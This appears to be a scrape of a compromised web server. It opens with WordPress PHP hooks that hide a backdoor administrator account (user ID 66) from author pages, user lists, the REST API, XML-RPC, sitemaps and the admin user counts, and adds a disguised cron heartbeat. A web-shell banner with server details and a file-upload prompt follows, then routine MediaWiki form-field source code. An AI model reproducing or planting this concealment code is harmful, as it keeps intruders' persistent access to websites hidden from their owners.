add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/htmlform/fields/ |
Upload File : |
<?php
namespace MediaWiki\HTMLForm\Field;
use MediaWiki\Html\Html;
use MediaWiki\HTMLForm\HTMLFormField;
use MediaWiki\HTMLForm\HTMLNestedFilterable;
use MediaWiki\HTMLForm\OOUIHTMLForm;
use MediaWiki\Request\WebRequest;
use MediaWiki\Widget\MenuTagMultiselectWidget;
use RuntimeException;
/**
* Multi-select field
*
* @stable to extend
*/
class HTMLMultiSelectField extends HTMLFormField implements HTMLNestedFilterable {
private bool $mDropdown = false;
private ?string $mPlaceholder = null;
/**
* @stable to call
*
* @param array $params
* In adition to the usual HTMLFormField parameters, this can take the following fields:
* - dropdown: If given, the options will be displayed inside a dropdown with a text field that
* can be used to filter them. This is desirable mostly for very long lists of options.
* This only works for users with JavaScript support and falls back to the list of checkboxes.
* - flatlist: If given, the options will be displayed on a single line (wrapping to following
* lines if necessary), rather than each one on a line of its own. This is desirable mostly
* for very short lists of concisely labelled options.
* - max: Maximum number of elements that can be selected. On the client-side, this is only
* enforced when using a dropdown.
*/
public function __construct( $params ) {
parent::__construct( $params );
// If the disabled-options parameter is not provided, use an empty array
if ( !isset( $this->mParams['disabled-options'] ) ) {
$this->mParams['disabled-options'] = [];
}
if ( isset( $params['dropdown'] ) ) {
$this->mDropdown = true;
if ( isset( $params['placeholder'] ) ) {
$this->mPlaceholder = $params['placeholder'];
} elseif ( isset( $params['placeholder-message'] ) ) {
$this->mPlaceholder = $this->msg( $params['placeholder-message'] )->text();
}
}
if ( isset( $params['flatlist'] ) ) {
$this->mClass .= ' mw-htmlform-flatlist';
}
}
/**
* @inheritDoc
* @stable to override
*/
public function validate( $value, $alldata ) {
$p = parent::validate( $value, $alldata );
if ( $p !== true ) {
return $p;
}
if ( !is_array( $value ) ) {
return false;
}
// Reject nested arrays (T274955)
$value = array_filter( $value, 'is_scalar' );
if ( isset( $this->mParams['required'] )
&& $this->mParams['required'] !== false
&& $value === []
) {
return $this->msg( 'htmlform-required' );
}
if ( isset( $this->mParams['max'] ) && ( count( $value ) > $this->mParams['max'] ) ) {
return $this->msg( 'htmlform-multiselect-toomany', $this->mParams['max'] );
}
# If all options are valid, array_intersect of the valid options
# and the provided options will return the provided options.
$validOptions = HTMLFormField::flattenOptions( $this->getOptions() );
$validValues = array_intersect( $value, $validOptions );
if ( count( $validValues ) == count( $value ) ) {
return true;
} else {
return $this->msg( 'htmlform-select-badoption' );
}
}
/**
* @inheritDoc
* @stable to override
*/
public function getInputHTML( $value ) {
$value = HTMLFormField::forceToStringRecursive( $value );
$html = $this->formatOptions( $this->getOptions(), $value );
return $html;
}
/**
* @stable to override
*
* @param array $options
* @param mixed $value
*
* @return string
*/
public function formatOptions( $options, $value ) {
$html = '';
$attribs = $this->getAttributes( [ 'disabled', 'tabindex' ] );
foreach ( $options as $label => $info ) {
if ( is_array( $info ) ) {
$html .= Html::rawElement( 'h1', [], $label ) . "\n";
$html .= $this->formatOptions( $info, $value );
} else {
$thisAttribs = [
'id' => "{$this->mID}-$info",
'value' => $info,
];
if ( in_array( $info, $this->mParams['disabled-options'], true ) ) {
$thisAttribs['disabled'] = 'disabled';
}
$checked = in_array( $info, $value, true );
$checkbox = $this->getOneCheckbox( $checked, $attribs + $thisAttribs, $label );
$html .= ' ' . Html::rawElement(
'div',
[ 'class' => 'mw-htmlform-flatlist-item' ],
$checkbox
);
}
}
return $html;
}
protected function getOneCheckbox( $checked, $attribs, $label ) {
if ( $this->mParent instanceof OOUIHTMLForm ) {
throw new RuntimeException( __METHOD__ . ' is not supported' );
} else {
$checkbox =
Html::check( "{$this->mName}[]", $checked, $attribs ) .
"\u{00A0}" .
Html::rawElement(
'label',
[ 'for' => $attribs['id'] ],
$this->escapeLabel( $label )
);
return $checkbox;
}
}
public function getOptionsOOUI() {
$optionsOouiSections = [];
$options = $this->getOptions();
// If the options are supposed to be split into sections, each section becomes a separate
// CheckboxMultiselectInputWidget.
foreach ( $options as $label => $section ) {
if ( is_array( $section ) ) {
$optionsOouiSections[ $label ] = Html::listDropdownOptionsOoui( $section );
unset( $options[$label] );
}
}
// If anything remains in the array, they are sectionless options. Put them at the beginning.
if ( $options ) {
$optionsOouiSections = array_merge(
[ '' => Html::listDropdownOptionsOoui( $options ) ],
$optionsOouiSections
);
}
return $optionsOouiSections;
}
/**
* Get the OOUI version of this field.
*
* Returns OOUI\CheckboxMultiselectInputWidget for fields that only have one section,
* string otherwise.
*
* @stable to override
* @since 1.28
* @param string[] $value
* @return \OOUI\Widget|string
* @suppress PhanParamSignatureMismatch
*/
public function getInputOOUI( $value ) {
$this->mParent->getOutput()->addModules( 'oojs-ui-widgets' );
if ( $this->mDropdown ) {
$this->mParent->getOutput()->addModuleStyles( 'mediawiki.widgets.TagMultiselectWidget.styles' );
}
// Reject nested arrays (T274955)
$value = array_filter( $value, 'is_scalar' );
$out = [];
$optionsSections = $this->getOptionsOOUI();
foreach ( $optionsSections as $sectionLabel => &$groupedOptions ) {
$attr = [];
$attr['name'] = "{$this->mName}[]";
$attr['value'] = $value;
foreach ( $groupedOptions as &$option ) {
$option['disabled'] = in_array( $option['data'], $this->mParams['disabled-options'], true );
}
foreach ( $groupedOptions as &$option ) {
$option['label'] = $this->makeLabelSnippet( $option['label'] );
}
unset( $option );
$attr['options'] = $groupedOptions;
$attr += \OOUI\Element::configFromHtmlAttributes(
$this->getAttributes( [ 'disabled', 'tabindex' ] )
);
if ( $this->mClass !== '' ) {
$attr['classes'] = [ $this->mClass ];
}
$widget = new \OOUI\CheckboxMultiselectInputWidget( $attr );
if ( $sectionLabel ) {
$out[] = new \OOUI\FieldsetLayout( [
'items' => [ $widget ],
'label' => $this->makeLabelSnippet( $sectionLabel ),
] );
} else {
$out[] = $widget;
}
}
unset( $groupedOptions );
$params = [];
if ( $this->mPlaceholder ) {
$params['placeholder'] = $this->mPlaceholder;
}
if ( isset( $this->mParams['max'] ) ) {
$params['tagLimit'] = $this->mParams['max'];
}
if ( $this->mDropdown ) {
return new MenuTagMultiselectWidget( [
'name' => $this->mName,
'options' => $optionsSections,
'default' => $value,
'noJsFallback' => $out,
'allowReordering' => false,
] + $params );
} elseif ( count( $out ) === 1 ) {
$firstFieldData = $out[0]->getData() ?: [];
$out[0]->setData( $firstFieldData + $params );
// Directly return the only OOUI\CheckboxMultiselectInputWidget.
// This allows it to be made infusable and later tweaked by JS code.
return $out[0];
}
return implode( '', $out );
}
protected function getOOUIModules() {
return $this->mDropdown ? [ 'mediawiki.widgets.MenuTagMultiselectWidget' ] : [];
}
protected function shouldInfuseOOUI() {
return $this->mDropdown;
}
/**
* @stable to override
* @param WebRequest $request
*
* @return string|array
*/
public function loadDataFromRequest( $request ) {
$fromRequest = $request->getArray( $this->mName, [] );
// Fetch the value in either one of the two following case:
// - we have a valid submit attempt (form was just submitted)
// - we have a value (an URL manually built by the user, or GET form with no wpFormIdentifier)
if ( $this->isSubmitAttempt( $request ) || $fromRequest ) {
// Checkboxes are just not added to the request arrays if they're not checked,
// so it's perfectly possible for there not to be an entry at all
// @phan-suppress-next-line PhanTypeMismatchReturnNullable getArray does not return null
return $fromRequest;
} else {
// That's ok, the user has not yet submitted the form, so show the defaults
return $this->getDefault();
}
}
/**
* @inheritDoc
* @stable to override
*/
public function getDefault() {
return $this->mDefault ?? [];
}
/**
* @inheritDoc
* @stable to override
*/
public function filterDataForSubmit( $data ) {
$data = HTMLFormField::forceToStringRecursive( $data );
$options = HTMLFormField::flattenOptions( $this->getOptions() );
$forcedOn = array_intersect( $this->mParams['disabled-options'], $this->getDefault() );
$res = [];
foreach ( $options as $opt ) {
$res["$opt"] = in_array( $opt, $forcedOn, true ) || in_array( $opt, $data, true );
}
return $res;
}
/**
* @inheritDoc
* @stable to override
*/
protected function needsLabel() {
return false;
}
}
/** @deprecated class alias since 1.42 */
class_alias( HTMLMultiSelectField::class, 'HTMLMultiSelectField' );